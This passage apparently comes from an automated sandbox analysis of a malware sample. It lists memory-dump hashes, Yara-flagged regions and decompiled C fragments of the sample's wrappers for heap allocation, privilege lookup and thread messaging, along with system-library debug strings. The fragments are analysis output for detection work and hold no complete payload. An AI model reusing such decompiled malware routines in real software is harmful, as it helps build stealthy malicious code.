                                                                      • Instruction Fuzzy Hash: 4390026164100502D50571995504616000AA7D0281F91C026A1015559ECB658992B171
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 463abcdc72f4aa273f6b4bc042aa5e1427bf99d04c3225ffaeb92b46c64c08fb
                                                                      • Instruction ID: 75a5d1fe39f5caccd18e7533e875d42779f42f3fbff8afa5f5c0f19af47615b9
                                                                      • Opcode Fuzzy Hash: 463abcdc72f4aa273f6b4bc042aa5e1427bf99d04c3225ffaeb92b46c64c08fb
                                                                      • Instruction Fuzzy Hash: E390027124100402D50465D965086460005A7E0341F51D015A5015559EC7A588917171
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 3adcff266a0a34dcf9fe20c75020b3989537fd24a51ab1c4fb854107e5648cb1
                                                                      • Instruction ID: 195b87be7af9acf8de8dd0d743f4cf98dc382f66c6d301deb8004c69dc0fb05f
                                                                      • Opcode Fuzzy Hash: 3adcff266a0a34dcf9fe20c75020b3989537fd24a51ab1c4fb854107e5648cb1
                                                                      • Instruction Fuzzy Hash: 6E90026925300002D5847199650860A0005A7D1242F91D419A000655CCCA5588696361
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: edb2401ba6ca458f869534f2cbb0de117f0fcda5590f9b928593ef5375346ae8
                                                                      • Instruction ID: 806f725a1962a95791149125857db1e9728388840d913412224fe160e492fcc8
                                                                      • Opcode Fuzzy Hash: edb2401ba6ca458f869534f2cbb0de117f0fcda5590f9b928593ef5375346ae8
                                                                      • Instruction Fuzzy Hash: 9690026134100003D544719965186064005F7E1341F51D015E0405558CDA5588566262
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: f2e44365c29029afd966b843783717fb87e6158fcf48d871702692de503f4675
                                                                      • Instruction ID: d1034e54e1a69311b32554bede4cb6dc2c8d07d78636a3970f0567c6a44bbd6d
                                                                      • Opcode Fuzzy Hash: f2e44365c29029afd966b843783717fb87e6158fcf48d871702692de503f4675
                                                                      • Instruction Fuzzy Hash: E890047135114403D51471DDD5047070005F7D1341F51C415F0C1555CDC7D5CCD17173
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 46b79e64f86b584822b861a1a43bfb918e75882635e2af3a93f66231ee08769a
                                                                      • Instruction ID: 4ebfa688bcad00d8647600a7a8542c7a69021ccc258cba721a4ef32ae78b22fc
                                                                      • Opcode Fuzzy Hash: 46b79e64f86b584822b861a1a43bfb918e75882635e2af3a93f66231ee08769a
                                                                      • Instruction Fuzzy Hash: 4090047134140403D50471DD5D1470F0005F7D0343F51C015F115555DDC775CC5175F1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 02be3722148de88484c93f471f12c5606a30b0e717df6f35e7ad55535652dca3
                                                                      • Instruction ID: 975b14d4e7e12aaed5f3e670bee1b5a01b14a4c3e66c40d9ba17e3d8c6371bcf
                                                                      • Opcode Fuzzy Hash: 02be3722148de88484c93f471f12c5606a30b0e717df6f35e7ad55535652dca3
                                                                      • Instruction Fuzzy Hash: C990026164100042454471A999449064005BBE1251B51C125A0989554DC699886566A5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 5704304f54665ef72d697058033ca4d6a8da222083c9ecd11818f69beb11c446
                                                                      • Instruction ID: f0d9774c0c992beafb13d9bc005af59a1634f177555174263d9af74602c06e21
                                                                      • Opcode Fuzzy Hash: 5704304f54665ef72d697058033ca4d6a8da222083c9ecd11818f69beb11c446
                                                                      • Instruction Fuzzy Hash: 9790026125180042D60465A95D14B070005A7D0343F51C119A0145558CCA5588616561
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: b723816b3fdc1b4fde7742d0ddccd80721326b263f750328e3a806c5c4212101
                                                                      • Instruction ID: debf293752da3740e2c414ba6c958cfb42b14494e9d43c2f3c2a357d5a53a417
                                                                      • Opcode Fuzzy Hash: b723816b3fdc1b4fde7742d0ddccd80721326b263f750328e3a806c5c4212101
                                                                      • Instruction Fuzzy Hash: 7B90027124100802D5847199550464A0005A7D1341F91C019A0016658DCB558A5977E1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: f8d3ebe1d624978670917b77af66243fa3e35273b67cc92d9eabef8a2393dcd6
                                                                      • Instruction ID: d3039eee1264bd046ffb3c4e7ad9cab9277b711b649af560c9209be1bf780b6e
                                                                      • Opcode Fuzzy Hash: f8d3ebe1d624978670917b77af66243fa3e35273b67cc92d9eabef8a2393dcd6
                                                                      • Instruction Fuzzy Hash: BD90027124108802D5146199950474A0005A7D0341F55C415A441565CDC7D588917161
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 299515b6a4c4b7fe34a0254a828e2e35bbff23895406936d62d23753fc4f2dc5
                                                                      • Instruction ID: 2d85129770ae1569db338c81f9331519a7dd6e0895954f6df8c699ab0d1d1ce1
                                                                      • Opcode Fuzzy Hash: 299515b6a4c4b7fe34a0254a828e2e35bbff23895406936d62d23753fc4f2dc5
                                                                      • Instruction Fuzzy Hash: C5212BB2C442085BCB11E6609D42BFF736C9B14304F04017FE989A3181FA38AB498BA7
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00418880(intOrPtr _a4, char _a8, long _a12, long _a16) {
                                                                      				void* _t10;
                                                                      				void* _t15;
                                                                      
                                                                      				E004191B0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                                                      				_t6 =  &_a8; // 0x413526
                                                                      				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
                                                                      				return _t10;
                                                                      			}

                                                                      Instruction addresses: 0x00418897, 0x004188a2, 0x004188ad, 0x004188b1

                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00408B03,?), ref: 004188AD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID: &5A
                                                                      • API String ID: 1279760036-1617645808
                                                                      • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                      • Instruction ID: 4ef14f879dafae0d6951d5bd0a6bbd37283b7ec5dd2ccf2ca50cdce3f5cd3bdb
                                                                      • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                      • Instruction Fuzzy Hash: 6CE012B1200208ABDB14EF99CC45EA777ADAF88654F158559FA095B242CA30F910CAF4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 004188ED
                                                                      • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418928
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExitFreeHeapProcess
                                                                      • String ID:
                                                                      • API String ID: 1180424539-0
                                                                      • Opcode ID: 712053724ce6fde3dda3dc2c9ff3630cdedbb5a685f270781d41f3608182f818
                                                                      • Instruction ID: e2a99679b142890d3171876c2147a3a0cbfe3255010accf2b4f8d621d631af7b
                                                                      • Opcode Fuzzy Hash: 712053724ce6fde3dda3dc2c9ff3630cdedbb5a685f270781d41f3608182f818
                                                                      • Instruction Fuzzy Hash: 3BF0F0B0200200BFC710DF69CC88EE73BA9EF88320F04864AF9089B312C630E900CAF4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 82%
                                                                      			E00407280(void* __eflags, intOrPtr _a4, long _a8) {
                                                                      				char _v67;
                                                                      				char _v68;
                                                                      				void* _t12;
                                                                      				intOrPtr* _t13;
                                                                      				int _t14;
                                                                      				long _t21;
                                                                      				intOrPtr* _t25;
                                                                      				void* _t26;
                                                                      				void* _t30;
                                                                      				int _t32; // holds the PostThreadMessageW result for the fallback call
                                                                      
                                                                      				_t30 = __eflags;
                                                                      				_v68 = 0;
                                                                      				E0041A110( &_v67, 0, 0x3f);
                                                                      				E0041ACF0( &_v68, 3);
                                                                      				_t12 = E00409B30(_t30, _a4 + 0x1c,  &_v68); // executed
                                                                      				_t13 = E00413E40(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                                                                      				_t25 = _t13;
                                                                      				if(_t25 != 0) {
                                                                      					_t21 = _a8;
                                                                      					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                                                                      					_t32 = _t14;
                                                                      					if(_t14 == 0) {
                                                                      						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409290(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
                                                                      					}
                                                                      					return _t14;
                                                                      				}
                                                                      				return _t13;
                                                                      			}

                                                                      Instruction addresses: 0x00407280, 0x0040728f, 0x00407293, 0x0040729e, 0x004072ae, 0x004072be, 0x004072c3, 0x004072ca, 0x004072cd, 0x004072da, 0x004072dc, 0x004072de, 0x004072fb, 0x004072fb, 0x00000000, 0x004072fd, 0x00407302

                                                                      APIs
                                                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: MessagePostThread
                                                                      • String ID:
                                                                      • API String ID: 1836367815-0
                                                                      • Opcode ID: 14624e8db26b89bccf1705d7108d041dc2e52ca21b332cab295bc8e658a3c696
                                                                      • Instruction ID: 7737b7532069fc333edaf9b0832c3edc759e3be1fb1c5433828103526b109584
                                                                      • Opcode Fuzzy Hash: 14624e8db26b89bccf1705d7108d041dc2e52ca21b332cab295bc8e658a3c696
                                                                      • Instruction Fuzzy Hash: 36018431A8022876E721A6959C03FFE776C5B00B55F15416EFF04BA1C2E6A87A0546EA
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 58%
                                                                      			E00418A13(void* __eax, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                                      				signed int _t8;
                                                                      				intOrPtr _t10; // copy of _a4 used for the +0xa18 field read
                                                                      				int _t13;
                                                                      				intOrPtr* _t14;
                                                                      				void* _t17;
                                                                      				void* _t20;
                                                                      
                                                                      				_t8 = __eax - 1;
                                                                      				if(_t8 > 0) {
                                                                      					L4:
                                                                      					return  *_t14(_t8, _t17);
                                                                      				} else {
                                                                      					_t8 = _t8 | 0xccd37f06;
                                                                      					if(_t8 != 0) {
                                                                      						goto L4;
                                                                      					} else {
                                                                      						 *0x8b5535d4 = _t8;
                                                                      						_t10 = _a4;
                                                                      						E004191B0(_t20, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_t10 + 0xa18)), 0, 0x46);
                                                                      						_t13 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                                      						return _t13;
                                                                      					}
                                                                      				}
                                                                      			}

                                                                      Instruction addresses: 0x00418a13, 0x00418a14, 0x00418a8a, 0x00418a90, 0x00418a16, 0x00418a16, 0x00418a1b, 0x00000000, 0x00418a1d, 0x00418a1d, 0x00418a23, 0x00418a3a, 0x00418a50, 0x00418a54, 0x00418a54, 0x00418a1b

                                                                      APIs
                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418A50
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: LookupPrivilegeValue
                                                                      • String ID:
                                                                      • API String ID: 3899507212-0
                                                                      • Opcode ID: 7b3da62df12b4d5133d59b8203d34cc138ae05f8eed264418d76068305e845be
                                                                      • Instruction ID: ccd63faf6446371bab5f84ecb0f24a74787d440f44f0fba3bef8737164e9a278
                                                                      • Opcode Fuzzy Hash: 7b3da62df12b4d5133d59b8203d34cc138ae05f8eed264418d76068305e845be
                                                                      • Instruction Fuzzy Hash: 2EF082B26402046FDB10DF55DC44EE73769EF85350F04845AF90D97300D935E8508BB4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 004188ED
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeHeap
                                                                      • String ID:
                                                                      • API String ID: 3298025750-0
                                                                      • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                      • Instruction ID: 8f9b7065ee004bfc107c5e1a3206d22b1dba8f53d1ba42c3d4a522b3320012f0
                                                                      • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                      • Instruction Fuzzy Hash: C0E012B1200208ABDB18EF99CC49EA777ADAF88750F018559FA095B242CA30E910CAF4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00418A20(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                                      				int _t10;
                                                                      				void* _t15;
                                                                      
                                                                      				E004191B0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                                                      				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                                      				return _t10;
                                                                      			}

                                                                      Instruction addresses: 0x00418a3a, 0x00418a50, 0x00418a54

                                                                      APIs
                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418A50
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: LookupPrivilegeValue
                                                                      • String ID:
                                                                      • API String ID: 3899507212-0
                                                                      • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                      • Instruction ID: 62f155a2f2b834774e03dd9f5cc664d450e5ddbb18d5cf86998e13752e76a9ec
                                                                      • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                      • Instruction Fuzzy Hash: 6EE01AB12002086BDB10DF49CC85EE737ADAF88650F018155FA0957241CA34E8508BF5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418928
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExitProcess
                                                                      • String ID:
                                                                      • API String ID: 621844428-0
                                                                      • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                      • Instruction ID: 622c55a551f2a3710ca15f35a1068b8193fa72338b31a42c8a230178039be0f3
                                                                      • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                      • Instruction Fuzzy Hash: 3FD012716002147BD620DB99CC85FD777ACDF48750F058065BA1D5B241C531BA00C6E5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 9cb18b6fed12162dcfbe7e53f712ec6a71720fd9f8c402fb9e59208c3e347836
                                                                      • Instruction ID: 7e4cd704267a1f972b1dc4b137c1656c7f540a9b1663b43e4be52149549e16b8
                                                                      • Opcode Fuzzy Hash: 9cb18b6fed12162dcfbe7e53f712ec6a71720fd9f8c402fb9e59208c3e347836
                                                                      • Instruction Fuzzy Hash: 30B09BB19414D5C5DA15D7A45708717790077D0745F16C055D1020645B4778C091F6B5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Strings
                                                                      • <unknown>, xrefs: 0123B27E, 0123B2D1, 0123B350, 0123B399, 0123B417, 0123B48E
                                                                      • *** then kb to get the faulting stack, xrefs: 0123B51C
                                                                      • *** Inpage error in %ws:%s, xrefs: 0123B418
                                                                      • The resource is owned shared by %d threads, xrefs: 0123B37E
                                                                      • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0123B2F3
                                                                      • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0123B314
                                                                      • write to, xrefs: 0123B4A6
                                                                      • The resource is owned exclusively by thread %p, xrefs: 0123B374
                                                                      • an invalid address, %p, xrefs: 0123B4CF
                                                                      • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0123B47D
                                                                      • The instruction at %p tried to %s , xrefs: 0123B4B6
                                                                      • *** enter .cxr %p for the context, xrefs: 0123B50D
                                                                      • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0123B53F
                                                                      • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0123B39B
                                                                      • The instruction at %p referenced memory at %p., xrefs: 0123B432
                                                                      • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0123B305
                                                                      • The critical section is owned by thread %p., xrefs: 0123B3B9
                                                                      • read from, xrefs: 0123B4AD, 0123B4B2
                                                                      • *** Resource timeout (%p) in %ws:%s, xrefs: 0123B352
                                                                      • Go determine why that thread has not released the critical section., xrefs: 0123B3C5
                                                                      • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0123B3D6
                                                                      • This failed because of error %Ix., xrefs: 0123B446
                                                                      • *** enter .exr %p for the exception record, xrefs: 0123B4F1
                                                                      • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0123B38F
                                                                      • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0123B323
                                                                      • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0123B476
                                                                      • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0123B484
                                                                      • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0123B2DC
                                                                      • *** An Access Violation occurred in %ws:%s, xrefs: 0123B48F
                                                                      • a NULL pointer, xrefs: 0123B4E0
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                      • API String ID: 0-108210295
                                                                      • Opcode ID: 4e8f817446ee11460009ed8b9f9a858b9b1d600239fdbc5ff7cbf16e56ef2afb
                                                                      • Instruction ID: 9c43c6ae5780850c67dee4b43554c279bb22557e997771f600dc3511fad9a4fd
                                                                      • Opcode Fuzzy Hash: 4e8f817446ee11460009ed8b9f9a858b9b1d600239fdbc5ff7cbf16e56ef2afb
                                                                      • Instruction Fuzzy Hash: 1181F7B5A60211BFDF2A9F4A9C47E7B3B76EFE7A51F004088F6042B252D3618552C772
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 44%
                                                                      			E01241C06() {
                                                                      				signed int _t27;
                                                                      				char* _t104;
                                                                      				char* _t105;
                                                                      				intOrPtr _t113;
                                                                      				intOrPtr _t115;
                                                                      				intOrPtr _t117;
                                                                      				intOrPtr _t119;
                                                                      				intOrPtr _t120;
                                                                      
                                                                      				_t105 = 0x11648a4;
                                                                      				_t104 = "HEAP: ";
                                                                      				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                      					_push(_t104);
                                                                      					E0118B150();
                                                                      				} else {
                                                                      					E0118B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                      				}
                                                                      				_push( *0x127589c);
                                                                      				E0118B150("Heap error detected at %p (heap handle %p)\n",  *0x12758a0);
                                                                      				_t27 =  *0x1275898; // 0x0
                                                                      				if(_t27 <= 0xf) {
                                                                      					switch( *((intOrPtr*)(_t27 * 4 +  &M01241E96))) {
                                                                      						case 0:
                                                                      							_t105 = "heap_failure_internal";
                                                                      							goto L21;
                                                                      						case 1:
                                                                      							goto L21;
                                                                      						case 2:
                                                                      							goto L21;
                                                                      						case 3:
                                                                      							goto L21;
                                                                      						case 4:
                                                                      							goto L21;
                                                                      						case 5:
                                                                      							goto L21;
                                                                      						case 6:
                                                                      							goto L21;
                                                                      						case 7:
                                                                      							goto L21;
                                                                      						case 8:
                                                                      							goto L21;
                                                                      						case 9:
                                                                      							goto L21;
                                                                      						case 0xa:
                                                                      							goto L21;
                                                                      						case 0xb:
                                                                      							goto L21;
                                                                      						case 0xc:
                                                                      							goto L21;
                                                                      						case 0xd:
                                                                      							goto L21;
                                                                      						case 0xe:
                                                                      							goto L21;
                                                                      						case 0xf:
                                                                      							goto L21;
                                                                      					}
                                                                      				}
                                                                      				L21:
                                                                      				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                      					_push(_t104);
                                                                      					E0118B150();
                                                                      				} else {
                                                                      					E0118B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                      				}
                                                                      				_push(_t105);
                                                                      				E0118B150("Error code: %d - %s\n",  *0x1275898);
                                                                      				_t113 =  *0x12758a4; // 0x0
                                                                      				if(_t113 != 0) {
                                                                      					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                      						_push(_t104);
                                                                      						E0118B150();
                                                                      					} else {
                                                                      						E0118B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                      					}
                                                                      					E0118B150("Parameter1: %p\n",  *0x12758a4);
                                                                      				}
                                                                      				_t115 =  *0x12758a8; // 0x0
                                                                      				if(_t115 != 0) {
                                                                      					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                      						_push(_t104);
                                                                      						E0118B150();
                                                                      					} else {
                                                                      						E0118B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                      					}
                                                                      					E0118B150("Parameter2: %p\n",  *0x12758a8);
                                                                      				}
                                                                      				_t117 =  *0x12758ac; // 0x0
                                                                      				if(_t117 != 0) {
                                                                      					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                      						_push(_t104);
                                                                      						E0118B150();
                                                                      					} else {
                                                                      						E0118B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                      					}
                                                                      					E0118B150("Parameter3: %p\n",  *0x12758ac);
                                                                      				}
                                                                      				_t119 =  *0x12758b0; // 0x0
                                                                      				if(_t119 != 0) {
                                                                      					L41:
                                                                      					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                      						_push(_t104);
                                                                      						E0118B150();
                                                                      					} else {
                                                                      						E0118B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                      					}
                                                                      					_push( *0x12758b4);
                                                                      					E0118B150("Last known valid blocks: before - %p, after - %p\n",  *0x12758b0);
                                                                      				} else {
                                                                      					_t120 =  *0x12758b4; // 0x0
                                                                      					if(_t120 != 0) {
                                                                      						goto L41;
                                                                      					}
                                                                      				}
                                                                      				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                      					_push(_t104);
                                                                      					E0118B150();
                                                                      				} else {
                                                                      					E0118B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                      				}
                                                                      				return E0118B150("Stack trace available at %p\n", 0x12758c0);
                                                                      			}

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
